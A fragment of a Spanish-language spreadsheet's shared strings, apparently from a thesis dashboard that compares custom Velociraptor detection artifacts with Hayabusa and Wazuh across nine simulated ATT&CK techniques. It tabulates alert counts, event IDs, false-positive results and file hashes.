    <t>Hayabusa CH detecta 3/9; ETW permanece NO CONCLUYENTE.</t>
  </si>
  <si>
    <t>TEC-002/004/006 mediante ruleset nativo.</t>
  </si>
  <si>
    <t>TEC-001/005/007/008 mediante reglas TFM 110xxx.</t>
  </si>
  <si>
    <t>HTTP 200 por runner</t>
  </si>
  <si>
    <t>TrackNetwork aporta visibilidad de conexión; el resultado HTTP no se atribuye al CLIENT_EVENT.</t>
  </si>
  <si>
    <t>5/14; 6/14; 7/14</t>
  </si>
  <si>
    <t>Arquitectura metodológica</t>
  </si>
  <si>
    <t>CLIENT_EVENT ≠ SERVER_EVENT</t>
  </si>
  <si>
    <t>El detector alerta; Router/Discord/webhook transportan o notifican.</t>
  </si>
  <si>
    <t>Añade semántica, severidad, trazabilidad y control de ruido a la telemetría disponible.</t>
  </si>
  <si>
    <t>Catálogo completo de artifacts custom, públicos y auxiliares</t>
  </si>
  <si>
    <t>Artifact principal y source interna son niveles distintos. CLIENT_EVENT detecta; SERVER_EVENT, Router, Discord, webhook y receiver transportan o acreditan salida externa.</t>
  </si>
  <si>
    <t>Bloque A · Artifacts custom TFM validados</t>
  </si>
  <si>
    <t>Categoría</t>
  </si>
  <si>
    <t>Sources internas</t>
  </si>
  <si>
    <t>Técnicas TEC</t>
  </si>
  <si>
    <t>MITRE ATT&amp;CK</t>
  </si>
  <si>
    <t>Fuente de telemetría</t>
  </si>
  <si>
    <t>Event IDs</t>
  </si>
  <si>
    <t>Función metodológica</t>
  </si>
  <si>
    <t>Uso en campaña final</t>
  </si>
  <si>
    <t>Técnicas detectadas</t>
  </si>
  <si>
    <t>Alertas CLIENT_EVENT</t>
  </si>
  <si>
    <t>FP hits</t>
  </si>
  <si>
    <t>Fichero validado</t>
  </si>
  <si>
    <t>SHA-256</t>
  </si>
  <si>
    <t>Custom.TFM.HIDS.P1.Critical.Priority.Event_v1</t>
  </si>
  <si>
    <t>Custom TFM</t>
  </si>
  <si>
    <t>4: P1_EVENT_PowerShell4104_Basic; P1_EVENT_Sysmon_ID1_Process_Basic; P1_EVENT_System7045_ServiceCreation; P1_EVENT_TEC009_Sysmon_Context</t>
  </si>
  <si>
    <t>TEC-004/005/007/008/009</t>
  </si>
  <si>
    <t>T1547.001; T1569.002; T1486; T1485; T1048.003/T1560.001</t>
  </si>
  <si>
    <t>PowerShell, Sysmon, System</t>
  </si>
  <si>
    <t>4104; 1; 3; 11; 7045</t>
  </si>
  <si>
    <t>Correlación/prioridad crítica</t>
  </si>
  <si>
    <t>5/9</t>
  </si>
  <si>
    <t>normalized/alertas_vr.csv; ALERTAS_VR</t>
  </si>
  <si>
    <t>Custom.TFM.HIDS.P1.Critical.Priority.Event_v1.yaml</t>
  </si>
  <si>
    <t>8A1FF2654405AF9E4412D32EF0C2BE08A383924654AA764A04AB264BAA42EDD7</t>
  </si>
  <si>
    <t>VALIDADO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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1059.001; T1059.003; T1053.005; T1547.001; T1569.002; T1518.001; T1486; T1485; T1048.003</t>
  </si>
  <si>
    <t>PowerShell, Sysmon, System, Security opcional</t>
  </si>
  <si>
    <t>4104; 1; 3; 11; 12/13/14; 23/26; 7045; 4698/4699</t>
  </si>
  <si>
    <t>Evidencia forense y contexto</t>
  </si>
  <si>
    <t>Custom.TFM.HIDS.P2.High.Forensic.Event_v1.yaml</t>
  </si>
  <si>
    <t>255C5F7CA39E362FE45106C662C4C35730EFF57A4063A1E9973FD11A6375FAA2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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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4104; 1; 3; 7045</t>
  </si>
  <si>
    <t>Detección de comportamiento</t>
  </si>
  <si>
    <t>Custom.TFM.HIDS.P3.Medium.Behavioral.Event_v1.yaml</t>
  </si>
  <si>
    <t>C591CB849753194F6F87834C1E0F34EDE6CDFF6B31BC63650A1D281ADA1D410A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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1059.001; T1059.003; T1053.005; T1547.001; T1569.002</t>
  </si>
  <si>
    <t>Sysmon y System</t>
  </si>
  <si>
    <t>1; 7045</t>
  </si>
  <si>
    <t>Señales básicas de baja complejidad</t>
  </si>
  <si>
    <t>Custom.TFM.HIDS.P4.Low.Basic_v2.yaml</t>
  </si>
  <si>
    <t>1EBB29296A14475E38BCF34CA8DD9CC16572F4A8CA00A1AB0C3608E0B3097BC1</t>
  </si>
  <si>
    <t>Telemetría básica; requiere perfiles superiores para semántica completa.</t>
  </si>
  <si>
    <t>Bloque B · Artifacts públicos, históricos, transporte y evidencia externa</t>
  </si>
  <si>
    <t>Público</t>
  </si>
  <si>
    <t>TEC-001/002/003/004/006; contexto 007/008/009</t>
  </si>
  <si>
    <t>Windows/Sysmon proceso</t>
  </si>
  <si>
    <t>1</t>
  </si>
  <si>
    <t>Telemetría de proceso</t>
  </si>
  <si>
    <t>Sí; campaña positiva</t>
  </si>
  <si>
    <t>0/9 específicas</t>
  </si>
  <si>
    <t>No aplicable</t>
  </si>
  <si>
    <t>Campaña pública normalizada</t>
  </si>
  <si>
    <t>Visibilidad no equivale a detección semántica.</t>
  </si>
  <si>
    <t>T1569.002 contextual</t>
  </si>
  <si>
    <t>7045</t>
  </si>
  <si>
    <t>Visibilidad de creación de servicio</t>
  </si>
  <si>
    <t>1 evento 7045</t>
  </si>
  <si>
    <t>El evento 7045 requiere interpretación; no se suma a Hayabusa CH.</t>
  </si>
  <si>
    <t>Visibilidad/forense</t>
  </si>
  <si>
    <t>1/3/11/12/13/14/26</t>
  </si>
  <si>
    <t>Reenvío de telemetría</t>
  </si>
  <si>
    <t>ID26 es evidencia forense, no alerta individual.</t>
  </si>
  <si>
    <t>Client Monitoring CH</t>
  </si>
  <si>
    <t>Reglas Sigma/Hayabusa</t>
  </si>
  <si>
    <t>TEC-001/003/005</t>
  </si>
  <si>
    <t>T1059.001; T1053.005; T1569.002</t>
  </si>
  <si>
    <t>EVTX/Sigma</t>
  </si>
  <si>
    <t>Detección específica pública</t>
  </si>
  <si>
    <t>7 High en TEC</t>
  </si>
  <si>
    <t>4 High / 1 caso</t>
  </si>
  <si>
    <t>Campaña Hayabusa CH</t>
  </si>
  <si>
    <t>Artifact público</t>
  </si>
  <si>
    <t>Mantener CH</t>
  </si>
  <si>
    <t>CHM no ejecutada; FP público separado del runner custom.</t>
  </si>
  <si>
    <t>Experimental</t>
  </si>
  <si>
    <t>No determinado</t>
  </si>
  <si>
    <t>Visibilidad potencial</t>
  </si>
  <si>
    <t>Campaña incompleta</t>
  </si>
  <si>
    <t>NO EVALUABLE</t>
  </si>
  <si>
    <t>Evidencia pública incompleta</t>
  </si>
  <si>
    <t>Faltan runner/log/summary TEC y parámetros.</t>
  </si>
  <si>
    <t>Contexto</t>
  </si>
  <si>
    <t>netstat/diff</t>
  </si>
  <si>
    <t>Visibilidad de conexión</t>
  </si>
  <si>
    <t>Conexión &lt;HOST_LAB&gt;:8088</t>
  </si>
  <si>
    <t>PID=0 y ProcInfo vacío; sin atribución fiable a powershell.exe.</t>
  </si>
  <si>
    <t>Histórico</t>
  </si>
  <si>
    <t>HUNT</t>
  </si>
  <si>
    <t>No RT</t>
  </si>
  <si>
    <t>EVTX</t>
  </si>
  <si>
    <t>Análisis histórico</t>
  </si>
  <si>
    <t>No incluido</t>
  </si>
  <si>
    <t>Resultados históricos</t>
  </si>
  <si>
    <t>Conservar como contraste</t>
  </si>
  <si>
    <t>No es alerta CLIENT_EVENT en tiempo real.</t>
  </si>
  <si>
    <t>Alertas servidor</t>
  </si>
  <si>
    <t>Enrutamiento</t>
  </si>
  <si>
    <t>Arquitectura pública</t>
  </si>
  <si>
    <t>Companion</t>
  </si>
  <si>
    <t>TRANSPORTE</t>
  </si>
  <si>
    <t>No contar</t>
  </si>
  <si>
    <t>No detector CLIENT_EVENT.</t>
  </si>
  <si>
    <t>Custom.TFM.HIDS.Router.JSONL.Discord.SOC_v3</t>
  </si>
  <si>
    <t>Custom auxiliar</t>
  </si>
  <si>
    <t>27 routes</t>
  </si>
  <si>
    <t>Todas las alertables</t>
  </si>
  <si>
    <t>Hereda del detector</t>
  </si>
  <si>
    <t>watch_monitoring</t>
  </si>
  <si>
    <t>Normalización JSONL/Discord</t>
  </si>
  <si>
    <t>No acreditado como detector</t>
  </si>
  <si>
    <t>YAML validado</t>
  </si>
  <si>
    <t>Custom.TFM.HIDS.Router.JSONL.Discord.SOC_v3.yaml</t>
  </si>
  <si>
    <t>574E3E8BC03E7C4D655400D5BB5527771E438CA67C413853A0AAAC7A10C5E33F</t>
  </si>
  <si>
    <t>VALIDADO / TRANSPORTE</t>
  </si>
  <si>
    <t>Mantener separado</t>
  </si>
  <si>
    <t>Transporta; no detecta ni suma cobertura.</t>
  </si>
  <si>
    <t>Receiver HTTP TEC-009</t>
  </si>
  <si>
    <t>Evidencia externa</t>
  </si>
  <si>
    <t>AUXILIAR</t>
  </si>
  <si>
    <t>Runner independiente</t>
  </si>
  <si>
    <t>Salida externa</t>
  </si>
  <si>
    <t>Receptor HTTP</t>
  </si>
  <si>
    <t>Acreditar upload externo</t>
  </si>
  <si>
    <t>Sí, por runner</t>
  </si>
  <si>
    <t>HTTPStatus=200; ZIP=6245 B; SHA-256 coincidente</t>
  </si>
  <si>
    <t>Summary de runner</t>
  </si>
  <si>
    <t>Trazado en FUENTES</t>
  </si>
  <si>
    <t>EVIDENCIA</t>
  </si>
  <si>
    <t>Conservar separado</t>
  </si>
  <si>
    <t>No es artifact detector ni capacidad de TrackNetworkConnections.</t>
  </si>
  <si>
    <t>Resultados reales de eficacia · artifacts custom P1-P4</t>
  </si>
  <si>
    <t>Tabla 1 · Resumen por perfil</t>
  </si>
  <si>
    <t>Artifact principal</t>
  </si>
  <si>
    <t>Sources internas ejecutadas</t>
  </si>
  <si>
    <t>Técnicas cubiertas declaradas</t>
  </si>
  <si>
    <t>Porcentaje sobre total</t>
  </si>
  <si>
    <t>Función principal</t>
  </si>
  <si>
    <t>Correlación y prioridad crítica</t>
  </si>
  <si>
    <t>ALERTAS_VR / alertas_vr.csv</t>
  </si>
  <si>
    <t>Volumen bajo y selectivo; no equivale a menor cobertura global.</t>
  </si>
  <si>
    <t>Source Security ScheduledTask opcional sin alertas en ventana.</t>
  </si>
  <si>
    <t>ZIP FileCreate sin filas; TEC-009 detectada por otras sources.</t>
  </si>
  <si>
    <t>Señal básica</t>
  </si>
  <si>
    <t>Alta telemetría de proceso; requiere perfiles superiores para semántica.</t>
  </si>
  <si>
    <t>TOTAL</t>
  </si>
  <si>
    <t>4 detectores CLIENT_EVENT</t>
  </si>
  <si>
    <t>Cobertura custom completa</t>
  </si>
  <si>
    <t>dataset_summary.json</t>
  </si>
  <si>
    <t>La suma de alertas es 379; una alerta no equivale a una técnica.</t>
  </si>
  <si>
    <t>Tabla 2 · Matriz TEC × perfil</t>
  </si>
  <si>
    <t>Total alertas</t>
  </si>
  <si>
    <t>Sources principales</t>
  </si>
  <si>
    <t>Estado de detección</t>
  </si>
  <si>
    <t>CU001_Source_TEC001_PowerShell_Basic; Forensic_EVENT_PowerShell4104_Strong_By_Technique; TEC001_PowerShell_4104</t>
  </si>
  <si>
    <t>PowerShell 4104 / ProcessCreation</t>
  </si>
  <si>
    <t>CU002_Source_TEC002_CMD_Basic; Forensic_EVENT_Sysmon_ID1_Process_By_Technique; TEC002_CMD_Sysmon</t>
  </si>
  <si>
    <t>Sysmon ID 1 / CMD</t>
  </si>
  <si>
    <t>CU003_Source_TEC003_ScheduledTask_Basic; Forensic_EVENT_Sysmon_ID1_Process_By_Technique; TEC003_ScheduledTask_Sysmon</t>
  </si>
  <si>
    <t>Sysmon ID 1 / Scheduled Task</t>
  </si>
  <si>
    <t>CU004_Source_TEC004_RunKeys_Basic; Forensic_EVENT_Sysmon_ID1_Process_By_Technique; Forensic_EVENT_Sysmon_Registry_File_Network_Context; P1_EVENT_Sysmon_ID1_Process_Basic; TEC004_RunKey_Sysmon</t>
  </si>
  <si>
    <t>Sysmon ID 1 y 12/13</t>
  </si>
  <si>
    <t>CU005_Source_TEC005_ServiceCreation_7045; Forensic_EVENT_Sysmon_ID1_Process_By_Technique; Forensic_EVENT_System_7045_ServiceCreation; P1_EVENT_Sysmon_ID1_Process_Basic; P1_EVENT_System7045_ServiceCreation; TEC005_Service_System7045</t>
  </si>
  <si>
    <t>System 7045 / Sysmon ID 1</t>
  </si>
  <si>
    <t>Forensic_EVENT_PowerShell4104_Strong_By_Technique; Forensic_EVENT_Sysmon_ID1_Process_By_Technique; TEC006_SecuritySoftwareDiscovery_4104; TEC006_SecuritySoftwareDiscovery_Sysmon</t>
  </si>
  <si>
    <t>PowerShell 4104 / Sysmon ID 1</t>
  </si>
  <si>
    <t>P1_EVENT_PowerShell4104_Basic; TEC007_DataEncryptedForImpact_4104</t>
  </si>
  <si>
    <t>Forensic_EVENT_Sysmon_ID1_Process_By_Technique; P1_EVENT_PowerShell4104_Basic; TEC008_DataDestruction_4104</t>
  </si>
  <si>
    <t>PowerShell 4104 / contexto Sysmon</t>
  </si>
  <si>
    <t>P1_EVENT_Sysmon_ID1_Process_Basic; P1_EVENT_TEC009_Sysmon_Context; TEC009_HTTP_Network_Sysmon_Context; TEC009_HTTP_Upload_Sysmon_Process_Context; TEC009_HTTP_ZIP_Upload_4104</t>
  </si>
  <si>
    <t>PowerShell 4104 / Sysmon ID 1 y 3</t>
  </si>
  <si>
    <t>Tabla 3 · Resultados por source interna y técnica</t>
  </si>
  <si>
    <t>Alertas</t>
  </si>
  <si>
    <t>Campaña</t>
  </si>
  <si>
    <t>Source file</t>
  </si>
  <si>
    <t>Validación</t>
  </si>
  <si>
    <t>4104</t>
  </si>
  <si>
    <t>2026-06-24T12:52:55.524Z .. 2026-06-24T12:52:55.524Z</t>
  </si>
  <si>
    <t>2026-06-24T12:53:42.608Z .. 2026-06-24T12:53:42.608Z</t>
  </si>
  <si>
    <t>2026-06-24T12:51:33.906Z .. 2026-06-24T12:51:33.952Z</t>
  </si>
  <si>
    <t>2026-06-24T12:51:51.549Z .. 2026-06-24T12:51:51.584Z</t>
  </si>
  <si>
    <t>2026-06-24T12:54:20.828Z .. 2026-06-24T12:54:20.862Z</t>
  </si>
  <si>
    <t>2026-06-24T12:51:51.589Z .. 2026-06-24T12:51:51.589Z</t>
  </si>
  <si>
    <t>2026-06-24T12:54:21.811Z .. 2026-06-24T12:54:21.811Z</t>
  </si>
  <si>
    <t>2026-06-24T12:50:53.989Z .. 2026-06-24T12:54:37.594Z</t>
  </si>
  <si>
    <t>2026-06-24T12:52:15.900Z .. 2026-06-24T12:52:16.265Z</t>
  </si>
  <si>
    <t>2026-06-24T12:50:22.551Z .. 2026-06-24T12:55:41.845Z</t>
  </si>
  <si>
    <t>2026-06-24T12:50:22.576Z .. 2026-06-24T12:51:22.687Z</t>
  </si>
  <si>
    <t>2026-06-24T12:50:22.806Z .. 2026-06-24T12:51:38.812Z</t>
  </si>
  <si>
    <t>2026-06-24T12:50:22.715Z .. 2026-06-24T12:52:00.122Z</t>
  </si>
  <si>
    <t>2026-06-24T12:52:15.300Z .. 2026-06-24T12:52:19.812Z</t>
  </si>
  <si>
    <t>2026-06-24T12:53:41.325Z .. 2026-06-24T12:53:41.325Z</t>
  </si>
  <si>
    <t>12</t>
  </si>
  <si>
    <t>2026-06-24T12:54:08.286Z .. 2026-06-24T12:54:08.286Z</t>
  </si>
  <si>
    <t>13</t>
  </si>
  <si>
    <t>2026-06-24T12:50:22.945Z .. 2026-06-24T12:55:41.845Z</t>
  </si>
  <si>
    <t>2026-06-24T12:50:22.551Z .. 2026-06-24T12:51:22.687Z</t>
  </si>
  <si>
    <t>2026-06-24T12:50:22.788Z .. 2026-06-24T12:51:38.812Z</t>
  </si>
  <si>
    <t>2026-06-24T12:52:15.255Z .. 2026-06-24T12:52:19.812Z</t>
  </si>
  <si>
    <t>2026-06-24T12:52:53.103Z .. 2026-06-24T12:52:55.848Z</t>
  </si>
  <si>
    <t>2026-06-24T12:54:20.862Z .. 2026-06-24T12:54:20.862Z</t>
  </si>
  <si>
    <t>2026-06-24T12:54:37.369Z .. 2026-06-24T12:54:37.369Z</t>
  </si>
  <si>
    <t>2026-06-24T12:50:22.977Z .. 2026-06-24T12:55:42.311Z</t>
  </si>
  <si>
    <t>Tabla 4 · Pruebas reales y falsos positivos custom</t>
  </si>
  <si>
    <t>Planificadas</t>
  </si>
  <si>
    <t>Ejecutadas</t>
  </si>
  <si>
    <t>Hits</t>
  </si>
  <si>
    <t>Lectura</t>
  </si>
  <si>
    <t>TEC real</t>
  </si>
  <si>
    <t>tecnicas_real_vr.csv / dataset_summary.json</t>
  </si>
  <si>
    <t>9/9 detectadas por CLIENT_EVENT custom.</t>
  </si>
  <si>
    <t>FP custom</t>
  </si>
  <si>
    <t>fp_runner.csv / fp_hits.csv / summary.json</t>
  </si>
  <si>
    <t>10/10 OK; 0 hits. Hayabusa FP queda separado.</t>
  </si>
  <si>
    <t>Justificación técnica: los públicos aportan visibilidad/alerta parcial; los custom aportan semántica, CU_ID, priorización, mantenibilidad y reducción de ruido.</t>
  </si>
  <si>
    <t>Un artifact monolítico dificulta granularidad, mantenibilidad, priorización y ajuste de ruido</t>
  </si>
  <si>
    <t>Granularidad por riesgo, trazabilidad y control operativo</t>
  </si>
  <si>
    <t>Arquitectura custom validada P4-P1</t>
  </si>
  <si>
    <t>Cuatro artifacts CLIENT_EVENT principales con sources internas por técnica. La complejidad es cualitativa y no representa una medida de rendimiento. No se localizó P0 en validated.</t>
  </si>
  <si>
    <t>Nombre exacto declarado</t>
  </si>
  <si>
    <t>Técnicas declaradas</t>
  </si>
  <si>
    <t>Uso campaña final</t>
  </si>
  <si>
    <t>4</t>
  </si>
  <si>
    <t>Sí; 19 alertas</t>
  </si>
  <si>
    <t>Complejidad operativa cualitativa alta; señales selectivas.</t>
  </si>
  <si>
    <t>5 declaradas / 4 ejecutadas</t>
  </si>
  <si>
    <t>Sí; 118 alertas</t>
  </si>
  <si>
    <t>ScheduledTask Security opcional sin filas en ventana.</t>
  </si>
  <si>
    <t>13 declaradas / 12 ejecutadas</t>
  </si>
  <si>
    <t>Sí; 109 alertas</t>
  </si>
  <si>
    <t>ZIP FileCreate sin filas; otras sources cubren TEC-009.</t>
  </si>
  <si>
    <t>5</t>
  </si>
  <si>
    <t>Sí; 133 alertas</t>
  </si>
  <si>
    <t>Complejidad operativa cualitativa baja; telemetría básica.</t>
  </si>
  <si>
    <t>P0</t>
  </si>
  <si>
    <t>No incorporado</t>
  </si>
  <si>
    <t>No existe fichero P0 en 01_ARTIFACTS/validated</t>
  </si>
  <si>
    <t>LABORATORIO/DEBUG</t>
  </si>
  <si>
    <t>0</t>
  </si>
  <si>
    <t>No utilizado</t>
  </si>
  <si>
    <t>No se inventa artifact ni ejecución.</t>
  </si>
  <si>
    <t>Relación entre artifact principal y sources internas ejecutadas</t>
  </si>
  <si>
    <t>Sources ejecutadas</t>
  </si>
  <si>
    <t>Sources declaradas sin filas</t>
  </si>
  <si>
    <t>Técnicas con alertas</t>
  </si>
  <si>
    <t>Señales</t>
  </si>
  <si>
    <t>P1_EVENT_PowerShell4104_Basic; P1_EVENT_Sysmon_ID1_Process_Basic; P1_EVENT_System7045_ServiceCreation; P1_EVENT_TEC009_Sysmon_Context</t>
  </si>
  <si>
    <t>Ninguna</t>
  </si>
  <si>
    <t>4104; Sysmon 1/3; System 7045</t>
  </si>
  <si>
    <t>PowerShell4104 Strong; Sysmon ID1; System 7045; Registry/File/Network Context</t>
  </si>
  <si>
    <t>Forensic_EVENT_Security_ScheduledTask_Optional</t>
  </si>
  <si>
    <t>TEC-001/002/003/004/005/006/008</t>
  </si>
  <si>
    <t>4104; Sysmon 1/12/13; System 7045</t>
  </si>
  <si>
    <t>12 sources TEC001-TEC009 con filas en ALERTAS_VR</t>
  </si>
  <si>
    <t>TEC009_ZIP_FileCreate_Sysmon_Context</t>
  </si>
  <si>
    <t>CU001; CU002; CU003; CU004; CU005</t>
  </si>
  <si>
    <t>ProcessCreation; System 7045</t>
  </si>
  <si>
    <t>Visibilidad del sistema por fuente y técnica</t>
  </si>
  <si>
    <t>Los recuentos son filas de telemetría/evidencia en ventana, no técnicas detectadas. Receiver HTTP se mantiene separado de la telemetría host.</t>
  </si>
  <si>
    <t>Total fuente</t>
  </si>
  <si>
    <t>Origen</t>
  </si>
  <si>
    <t>Unidad</t>
  </si>
  <si>
    <t>Observaciones metodológicas</t>
  </si>
  <si>
    <t>normalized/visibilidad_sistema.csv</t>
  </si>
  <si>
    <t>Filas de evento en ventana</t>
  </si>
  <si>
    <t>Telemetría visible; no equivale automáticamente a detección.</t>
  </si>
  <si>
    <t>summary/runner TEC-009</t>
  </si>
  <si>
    <t>Confirmación externa</t>
  </si>
  <si>
    <t>HTTP 200 del runner independiente; no detector host.</t>
  </si>
  <si>
    <t>TOTAL HOST (sin receiver)</t>
  </si>
  <si>
    <t>TOTAL GENERAL</t>
  </si>
  <si>
    <t>Suma de telemetría host</t>
  </si>
  <si>
    <t>Filas; fuentes pueden solaparse</t>
  </si>
  <si>
    <t>Total por técnica y fuente; no combinar con conteos de técnicas detectadas.</t>
  </si>
  <si>
    <t>Host + receiver</t>
  </si>
  <si>
    <t>Niveles distintos</t>
  </si>
  <si>
    <t>Se conserva solo para trazabilidad; receiver no se representa como fuente host.</t>
  </si>
  <si>
    <t>Gráficas de eficacia, cobertura y trazabilidad</t>
  </si>
  <si>
    <t>Todos los gráficos usan tablas fuente visibles. Volumen de alertas ≠ cobertura; salida externa queda fuera de las capacidades del detector.</t>
  </si>
  <si>
    <t>Campaña TEC</t>
  </si>
  <si>
    <t>Campaña FP</t>
  </si>
  <si>
    <t>Denominadores separados: TEC=9; FP=10. HITS solo aplica a FP custom.</t>
  </si>
  <si>
    <t>Total</t>
  </si>
  <si>
    <t>Capacidad HIDS</t>
  </si>
  <si>
    <t>Escala: 0=no acreditado; 1=parcial/contextual; 2=acreditado. La salida externa se evalúa aparte.</t>
  </si>
  <si>
    <t>Lectura metodológica: el volumen de alertas muestra intensidad de señal, no mayor cobertura. La matriz TEC × perfil y el heatmap de capacidades conservan visibilidad, detección, alerta, evidencia y FP como dimensiones distintas.</t>
  </si>
  <si>
    <t>Dashboard definitivo · eficacia HIDS/DFIR</t>
  </si>
  <si>
    <t>Custom P1-P4, artifacts públicos, falsos positivos y Wazuh; visibilidad, detección, alerta, transporte y salida externa permanecen separados.</t>
  </si>
  <si>
    <t>Evidencia / interpretación</t>
  </si>
  <si>
    <t>4 detectores CLIENT_EVENT + 1 Router SERVER_EVENT de transporte.</t>
  </si>
  <si>
    <t>Sources detectoras con alertas</t>
  </si>
  <si>
    <t>25/27</t>
  </si>
  <si>
    <t>Dos sources declaradas no generaron filas en la ventana final.</t>
  </si>
  <si>
    <t>5 POSITIVO; 1 NO CONCLUYENTE</t>
  </si>
  <si>
    <t>Hayabusa CH 3/9; ETW no concluyente.</t>
  </si>
  <si>
    <t>TEC-002/004/006; ruleset nativo.</t>
  </si>
  <si>
    <t>TEC-001/005/007/008; reglas TFM 110xxx.</t>
  </si>
  <si>
    <t>Visibilidad Sysmon</t>
  </si>
  <si>
    <t>ID 1/3/11/12-14/26</t>
  </si>
  <si>
    <t>Telemetría y evidencia; ID26 no es alerta individual.</t>
  </si>
  <si>
    <t>TrackNetwork observa conexión sin proceso atribuible; HTTP no se atribuye al artifact.</t>
  </si>
  <si>
    <t>Separación de capas</t>
  </si>
  <si>
    <t>Router/Discord/webhook transportan o notifican; no detectan.</t>
  </si>
  <si>
    <t>5/14</t>
  </si>
  <si>
    <t>6/14</t>
  </si>
  <si>
    <t>7/14</t>
  </si>
  <si>
    <t>Navegación interna</t>
  </si>
  <si>
    <t>Catálogo de artifacts</t>
  </si>
  <si>
    <t>Resultados custom</t>
  </si>
  <si>
    <t>Visibilidad del sistema</t>
  </si>
  <si>
    <t>Alertas VR</t>
  </si>
  <si>
    <t>Runner FP</t>
  </si>
  <si>
    <t>Comparación VR-Wazuh</t>
  </si>
  <si>
    <t>Detalle Wazuh</t>
  </si>
  <si>
    <t>Gráficas</t>
  </si>
  <si>
    <t>Fuentes</t>
  </si>
  <si>
    <t>Capa</t>
  </si>
  <si>
    <t>Tácticas</t>
  </si>
  <si>
    <t>FP CH High/Critical</t>
  </si>
  <si>
    <t>Consolidar visibilidad, detección CLIENT_EVENT, artifacts custom/públicos, alertabilidad, FP y comparación Wazuh para la memoria del TFM.</t>
  </si>
  <si>
    <t>Maestro actual de ENTREGABLE; evidencia normalizada y YAML validados tienen prioridad.</t>
  </si>
  <si>
    <t>P1-P4 CLIENT_EVENT + Router SERVER_EVENT; 27 sources detectoras declaradas, 25 con alertas en campaña final.</t>
  </si>
  <si>
    <t>Alcance excluido</t>
  </si>
  <si>
    <t>CPU, memoria, E/S, consumo por proceso y escenarios de rendimiento pertenecen a otro libro y no se analizan aquí.</t>
  </si>
  <si>
    <t>Excel antiguos</t>
  </si>
  <si>
    <t>Los dos ficheros históricos comparados son idénticos; no se recuperan métricas obsoletas ni estados Pendiente.</t>
  </si>
  <si>
    <t>Artifacts custom detectores</t>
  </si>
  <si>
    <t>P1-P4 CLIENT_EVENT; nombres exactos y hashes en catálogo.</t>
  </si>
  <si>
    <t>Artifact custom de transporte</t>
  </si>
  <si>
    <t>Router SERVER_EVENT validado; no suma detección.</t>
  </si>
  <si>
    <t>Sources con alertas finales</t>
  </si>
  <si>
    <t>P0 Debug</t>
  </si>
  <si>
    <t>NO LOCALIZADO</t>
  </si>
  <si>
    <t>No existe YAML P0 en validated; no se inventa uso ni resultado.</t>
  </si>
  <si>
    <t>Cuatro artifacts principales P1-P4, 25 sources con alertas y 9/9 técnicas. El volumen 379 no es la unidad de cobertura.</t>
  </si>
  <si>
    <t>Aportación custom Velociraptor: P4 aporta señales básicas; P3 cubre 9/9 con semántica; P2 añade contexto forense; P1 prioriza señales críticas. Router SERVER_EVENT queda fuera de la detección.</t>
  </si>
  <si>
    <t>Fuentes analizadas y trazabilidad SHA-256</t>
  </si>
  <si>
    <t>Prioridad: evidencia normalizada, campañas reales, artifacts validados y maestro actual. Los Excel históricos se usan solo como contraste.</t>
  </si>
  <si>
    <t>Fichero</t>
  </si>
  <si>
    <t>Ruta relativa</t>
  </si>
  <si>
    <t>Tamaño</t>
  </si>
  <si>
    <t>Uso</t>
  </si>
  <si>
    <t>Hoja o métrica derivada</t>
  </si>
  <si>
    <t>F-0001</t>
  </si>
  <si>
    <t>Analisis_Tecnicas_TFM_V.4.xlsx</t>
  </si>
  <si>
    <t>179555</t>
  </si>
  <si>
    <t>USADA</t>
  </si>
  <si>
    <t>F-0002</t>
  </si>
  <si>
    <t>CU001_Source_TEC001_PowerShell_Basic-2026-06-23T12_00_00Z-2026-06-24T12_00_00Z-C.364907172793f8c7.csv</t>
  </si>
  <si>
    <t>780015</t>
  </si>
  <si>
    <t>F-0003</t>
  </si>
  <si>
    <t>CU002_Source_TEC002_CMD_Basic-2026-06-23T12_00_00Z-2026-06-24T12_00_00Z-C.364907172793f8c7.csv</t>
  </si>
  <si>
    <t>1254734</t>
  </si>
  <si>
    <t>F-0004</t>
  </si>
  <si>
    <t>CU003_Source_TEC003_ScheduledTask_Basic-2026-06-23T12_00_00Z-2026-06-24T12_00_00Z-C.364907172793f8c7.csv</t>
  </si>
  <si>
    <t>158367</t>
  </si>
  <si>
    <t>F-0005</t>
  </si>
  <si>
    <t>CU004_Source_TEC004_RunKeys_Basic-2026-06-23T12_00_00Z-2026-06-24T12_00_00Z-C.364907172793f8c7.csv</t>
  </si>
  <si>
    <t>108293</t>
  </si>
  <si>
    <t>F-0006</t>
  </si>
  <si>
    <t>CU005_Source_TEC005_ServiceCreation_7045-2026-06-23T12_00_00Z-2026-06-24T12_00_00Z-C.364907172793f8c7.csv</t>
  </si>
  <si>
    <t>8841</t>
  </si>
  <si>
    <t>F-0007</t>
  </si>
  <si>
    <t>Forensic_EVENT_PowerShell4104_Strong_By_Technique-2026-06-23T12_00_00Z-2026-06-24T12_00_00Z-C.364907172793f8c7.csv</t>
  </si>
  <si>
    <t>1689325</t>
  </si>
  <si>
    <t>F-0008</t>
  </si>
  <si>
    <t>Forensic_EVENT_Sysmon_ID1_Process_By_Technique-2026-06-23T12_00_00Z-2026-06-24T12_00_00Z-C.364907172793f8c7.csv</t>
  </si>
  <si>
    <t>4082771</t>
  </si>
  <si>
    <t>F-0009</t>
  </si>
  <si>
    <t>Forensic_EVENT_Sysmon_Registry_File_Network_Context-2026-06-23T12_00_00Z-2026-06-24T12_00_00Z-C.364907172793f8c7.csv</t>
  </si>
  <si>
    <t>151185</t>
  </si>
  <si>
    <t>F-0010</t>
  </si>
  <si>
    <t>Forensic_EVENT_System_7045_ServiceCreation-2026-06-23T12_00_00Z-2026-06-24T12_00_00Z-C.364907172793f8c7.csv</t>
  </si>
  <si>
    <t>19831</t>
  </si>
  <si>
    <t>F-0011</t>
  </si>
  <si>
    <t>P1_EVENT_PowerShell4104_Basic-2026-06-23T12_00_00Z-2026-06-24T12_00_00Z-C.364907172793f8c7.csv</t>
  </si>
  <si>
    <t>45216047</t>
  </si>
  <si>
    <t>F-0012</t>
  </si>
  <si>
    <t>P1_EVENT_Sysmon_ID1_Process_Basic-2026-06-23T12_00_00Z-2026-06-24T12_00_00Z-C.364907172793f8c7.csv</t>
  </si>
  <si>
    <t>100035</t>
  </si>
  <si>
    <t>F-0013</t>
  </si>
  <si>
    <t>P1_EVENT_System7045_ServiceCreation-2026-06-23T12_00_00Z-2026-06-24T12_00_00Z-C.364907172793f8c7.csv</t>
  </si>
  <si>
